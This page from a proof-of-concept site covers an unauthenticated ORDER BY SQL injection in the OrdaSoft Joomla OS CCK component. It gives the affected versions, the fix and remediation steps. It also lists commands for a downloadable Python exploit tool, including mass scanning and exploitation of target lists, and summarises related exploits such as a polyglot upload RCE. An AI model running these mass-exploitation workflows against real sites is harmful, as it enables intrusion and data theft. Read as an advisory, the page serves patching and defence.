CVE-2026-102428 — OrdaSoft Joomla CCK (com_os_cck) Unauthenticated ORDER BY SQLi
October 10, 2026 · 128 views
OrdaSoft OS CCK com_os_cck 1.0.0–8.3.15: public listing sort order_field/order_direction appended to SQL ORDER BY without column allow-list (CWE-89). Unauth error-based extract, check + mass exploit. CVSS 4.0 9.3 Critical. Fixed 8.3.16+ (same as CVE-2026-102427). Marker POCBIT-102428-OK.
Description
Overview
CVE-2026-102428 — OrdaSoft Joomla Content Construction Kit (OS CCK) (com_os_cck) — unauthenticated SQL injection in public CCK record listings via order_field / order_direction (CWE-89).
| | | |---|---| | Affected | 1.0.0 – 8.3.15 | | Fix | ≥ 8.3.16 (same release as upload RCE CVE-2026-102427) | | CVSS 4.0 | 9.3 Critical — AV:N/AC:L/AT:N/PR:N/UI:N | | Verify marker | POCBIT-102428-OK |
Client-controlled sort keys are appended to ORDER BY without validating against real table columns. 8.3.16 adds an allow-list and safe ASC/DESC handling.
PoC page: https://pocbit.org/pocs/cve-2026-102428
GitHub: murrez/CVE-2026-102428
CVE.org: CVE-2026-102428
NVD: CVE-2026-102428
Related: CVE-2026-102427 — unauth upload RCE in the same component, fixed in 8.3.16.
Bundled tool (Python 3)
Download cve-2026-102428.py — writes poc.py, requirements.txt, targets.example.txt.
python cve-2026-102428.py
pip install -r requirements.txt
python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --chain
python poc.py --list targets.example.txt --mode check -j 30 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --exploited-list exploited.txt
Exploit discovers public com_os_cck listing routes, primes sort, then error-based ORDER BY injection (MySQL). Vectors: order_field_get/post, order_direction_get/post. Example leak: POCBIT-102428-OK:8.0.36.
Discovery hints (your assets only)
body="com_os_cck"
Confirm version via administrator/components/com_os_cck/os_cck.xml and patch to ≥ 8.3.16.
Remediation
- Upgrade OS CCK to 8.3.16+.
- Patch both 102428 (SQLi) and 102427 (upload RCE) in one upgrade.
- Review WAF rules on public CCK listing parameters.
Legal and ethical use
Authorized security testing only.
References
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- JoomlaCVE-2026-101110critical
CVE-2026-101110 — OrdaSoft Joomla Book Library (Free) Unauthenticated SQL Injection
OrdaSoft Book Library (Free) for Joomla ≤ 6.4.6: unauthenticated SQL injection (CWE-89) in books() via field/direction sort params — weak select substring blacklist + protectInjectionWithoutQuote, unquoted ORDER BY, session prime + `-- xselect` bypass (com_booklibrary). Fixed in 6.4.7+. CVSS 4.0 9.3 Critical. Python PoC: check, exploit, mass -j.
- JoomlaCVE-2026-101108critical
CVE-2026-101108 — OrdaSoft Joomla Vehicle Manager (Free) Unauthenticated SQL Injection
OrdaSoft Vehicle Manager (Free) for Joomla ≤ 6.5.7: unauthenticated SQL injection (CWE-89) via order_field and order_direction concatenated into unquoted ORDER BY in site/vehiclemanager.php (com_vehiclemanager). Escaping is ineffective for sort keys. Public category, search, and all-vehicles views. Fixed in 6.5.8+. CVSS 4.0 9.3 Critical. Python PoC: check, error-based exploit, mass -j.
- JoomlaCVE-2026-100752high
CVE-2026-100752 — OrdaSoft Joomla Real Estate Manager (Free) Unauthenticated SQL Injection
OrdaSoft Real Estate Manager (Free) for Joomla ≤ 6.7.8: unauthenticated SQL injection (CWE-89) via order_field concatenated into ORDER BY in site/realestatemanager.php (com_realestatemanager). Public category, search, and listing views — no auth. Fixed in 6.7.9+. Python PoC: fingerprint, check, error-based exploit, mass -j; legacy order_direction POST fallback.
- JoomlaCVE-2026-102427critical
CVE-2026-102427 — OrdaSoft Joomla CCK (com_os_cck) Unauthenticated Upload RCE
OrdaSoft OS CCK for Joomla 1.0.0–8.3.15: unauthenticated front-end task getContent reaches site/uploader.php — GIF/PHP polyglot passes magic-byte check while .php extension from attacker filename is written under web root (CWE-434). CVSS 4.0 10.0 Critical (AT:N). Fixed in 8.3.16+. Python PoC: check, exploit (POCBIT-102427-OK), mass + interactive.